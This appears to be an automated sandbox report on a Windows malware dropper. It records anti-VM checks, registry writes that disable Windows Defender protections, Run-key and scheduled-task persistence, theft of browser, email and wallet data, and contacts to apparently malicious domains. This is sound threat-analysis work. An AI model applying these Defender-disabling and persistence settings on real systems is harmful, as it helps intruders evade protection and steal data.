Malware Analysis Report

2025-04-03 09:24

Sample ID 250306-b1yk8svqs9
Target bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e
SHA256 bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e
Tags
defense_evasion discovery spyware stealer amadey gcleaner healer litehttp stealc systembc xmrig 092155 trump bot dropper evasion execution loader miner persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e

Threat Level: Known bad

The file bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery spyware stealer amadey gcleaner healer litehttp stealc systembc xmrig 092155 trump bot dropper evasion execution loader miner persistence trojan

Modifies Windows Defender DisableAntiSpyware settings

Xmrig family

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender TamperProtection settings

Amadey

SystemBC

GCleaner

LiteHTTP

Litehttp family

Stealc family

Systembc family

Modifies Windows Defender notification settings

Amadey family

Healer

xmrig

Detects Healer an antivirus disabler dropper

Gcleaner family

Healer family

Stealc

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks computer location settings

Reads user/profile data of local email clients

Identifies Wine through registry keys

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

.NET Reactor proctector

Drops startup file

Windows security modification

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates processes with tasklist

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Modifies registry class

Kills process with taskkill

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 01:37

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 01:37

Reported

2025-03-06 01:39

Platform

win7-20241023-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1212

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp

Files

memory/2156-0-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-1-0x0000000077AD0000-0x0000000077AD2000-memory.dmp

memory/2156-2-0x0000000000DF1000-0x0000000000E51000-memory.dmp

memory/2156-3-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-4-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-5-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-6-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-7-0x0000000000DF1000-0x0000000000E51000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 01:37

Reported

2025-03-06 01:39

Platform

win10v2004-20250217-en

Max time kernel

105s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xmrig family

xmrig

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\nrwu\epug.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\nrwu\epug.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\nrwu\epug.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\nrwu\epug.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\ProgramData\nrwu\epug.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3d86f4f105.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108970101\\3d86f4f105.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9c1fc92bca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108980101\\9c1fc92bca.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ed16c1310c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\ed16c1310c.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\qD7QoBvD\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bdc4900b3c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108950101\\bdc4900b3c.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1fd8abdc9d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108960101\\1fd8abdc9d.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
